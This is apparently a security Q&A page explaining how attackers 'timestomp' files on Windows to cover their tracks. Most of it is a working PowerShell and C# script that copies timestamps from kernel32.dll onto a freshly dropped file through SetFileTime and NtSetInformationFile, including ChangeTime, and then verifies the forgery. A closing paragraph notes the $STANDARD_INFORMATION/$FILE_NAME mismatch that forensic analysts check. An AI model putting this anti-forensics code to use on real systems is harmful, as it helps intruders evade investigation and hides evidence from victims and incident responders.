How can an attacker modify file timestamps to cover their tracks after deploying or overwriting files on a Windows system?
Attackers can call the Win32 API `SetFileTime` to rewrite a file's CreationTime, LastAccessTime and LastWriteTime, or use the native API `NtSetInformationFile` (with the `FileBasicInformation` class) to additionally rewrite the MFT ChangeTime, which `SetFileTime` does not expose. This is commonly called "timestomping". Both calls only affect the timestamps stored in the `$STANDARD_INFORMATION` attribute; the second copy kept in the `$FILE_NAME` attribute is left untouched, which is why forensic analysts compare the two. For deeper stealth an attacker with raw volume access can edit the MFT record itself (both `$STANDARD_INFORMATION` and `$FILE_NAME`) with a hex editor such as WinHex. Our Penetration Techniques - Time Attributes of NTFS Files in Windows article provides implementation details and code references.
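The two API routes described above, as an added example (this is illustrative code written for this page, not code from the referenced article): the Win32 path through .NET's `File.Set*Time` wrappers, which call `SetFileTime`, and the native path through `NtSetInformationFile` with `FileBasicInformation`, which is the only way to rewrite ChangeTime. The target path, the decoy file used to borrow plausible timestamps, and the helper class name `Stomp` are assumptions; `NtQueryInformationFile` is included only to read the result back.

```powershell
# Added example, not from the referenced article. Requires Windows and a handle with
# FILE_WRITE_ATTRIBUTES on the target (no admin needed for your own files).
$target = Join-Path $env:TEMP 'dropped.dll'      # assumption: the file just deployed
Set-Content -Path $target -Value 'demo payload'    # constructed sample file

# Borrow timestamps from a neighbouring system file so the file blends in.
$decoy = Get-Item "$env:SystemRoot\System32\kernel32.dll"

# 1) SetFileTime route: .NET File.Set*TimeUtc wrap SetFileTime and cover the three
#    $STANDARD_INFORMATION timestamps Win32 exposes.
[System.IO.File]::SetCreationTimeUtc($target,   $decoy.CreationTimeUtc)
[System.IO.File]::SetLastAccessTimeUtc($target, $decoy.LastAccessTimeUtc)
[System.IO.File]::SetLastWriteTimeUtc($target,  $decoy.LastWriteTimeUtc)

# 2) NtSetInformationFile route: FILE_BASIC_INFORMATION also carries ChangeTime.
#    A zero in any field means "leave that timestamp alone".
Add-Type @"
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;

public static class Stomp {   // assumed helper name
    [StructLayout(LayoutKind.Sequential)]
    public struct IO_STATUS_BLOCK { public IntPtr Status; public IntPtr Information; }

    [StructLayout(LayoutKind.Sequential)]
    public struct FILE_BASIC_INFORMATION {
        public long CreationTime, LastAccessTime, LastWriteTime, ChangeTime;
        public uint FileAttributes;
    }

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern SafeFileHandle CreateFileW(string name, uint access, uint share,
        IntPtr sa, uint disposition, uint flags, IntPtr template);

    [DllImport("ntdll.dll")]
    static extern int NtSetInformationFile(SafeFileHandle h, ref IO_STATUS_BLOCK iosb,
        ref FILE_BASIC_INFORMATION info, int length, int infoClass);

    [DllImport("ntdll.dll")]
    static extern int NtQueryInformationFile(SafeFileHandle h, ref IO_STATUS_BLOCK iosb,
        out FILE_BASIC_INFORMATION info, int length, int infoClass);

    const uint FILE_READ_ATTRIBUTES = 0x80, FILE_WRITE_ATTRIBUTES = 0x100;
    const uint FILE_SHARE_ALL = 0x7, OPEN_EXISTING = 3;
    const int FileBasicInformation = 4;

    static SafeFileHandle Open(string path, uint access) {
        var h = CreateFileW(path, access, FILE_SHARE_ALL, IntPtr.Zero,
                            OPEN_EXISTING, 0, IntPtr.Zero);
        if (h.IsInvalid) throw new System.ComponentModel.Win32Exception();
        return h;
    }

    // Rewrites only ChangeTime; returns the NTSTATUS (0 == STATUS_SUCCESS).
    public static int SetChangeTime(string path, DateTime utc) {
        using (var h = Open(path, FILE_WRITE_ATTRIBUTES)) {
            var fbi  = new FILE_BASIC_INFORMATION { ChangeTime = utc.ToFileTimeUtc() };
            var iosb = new IO_STATUS_BLOCK();
            return NtSetInformationFile(h, ref iosb, ref fbi,
                Marshal.SizeOf(typeof(FILE_BASIC_INFORMATION)), FileBasicInformation);
        }
    }

    // Reads all four $STANDARD_INFORMATION timestamps back for verification.
    public static FILE_BASIC_INFORMATION Query(string path) {
        using (var h = Open(path, FILE_READ_ATTRIBUTES)) {
            var iosb = new IO_STATUS_BLOCK();
            FILE_BASIC_INFORMATION fbi;
            int st = NtQueryInformationFile(h, ref iosb, out fbi,
                Marshal.SizeOf(typeof(FILE_BASIC_INFORMATION)), FileBasicInformation);
            if (st != 0) throw new InvalidOperationException("NTSTATUS 0x" + st.ToString("X8"));
            return fbi;
        }
    }
}
"@

$status = [Stomp]::SetChangeTime($target, $decoy.LastWriteTimeUtc)
'NtSetInformationFile -> NTSTATUS 0x{0:X8}' -f $status

# Verify: all four $STANDARD_INFORMATION timestamps now match the decoy.
$fbi = [Stomp]::Query($target)
[PSCustomObject]@{
    Creation   = [DateTime]::FromFileTimeUtc($fbi.CreationTime)
    LastAccess = [DateTime]::FromFileTimeUtc($fbi.LastAccessTime)
    LastWrite  = [DateTime]::FromFileTimeUtc($fbi.LastWriteTime)
    Change     = [DateTime]::FromFileTimeUtc($fbi.ChangeTime)
}
```

Opening the handle with only `FILE_WRITE_ATTRIBUTES` (rather than a generic write handle) matters: no data is written, so NTFS has no reason to bump LastWriteTime again on close. Note what this does not hide: the `$FILE_NAME` timestamps still record the real drop time, and `Get-Item`, `dir` and Explorer show only the `$STANDARD_INFORMATION` copy, so a quick visual check will look clean while an MFT parser will show the `$SI`/`$FN` mismatch that defenders hunt for.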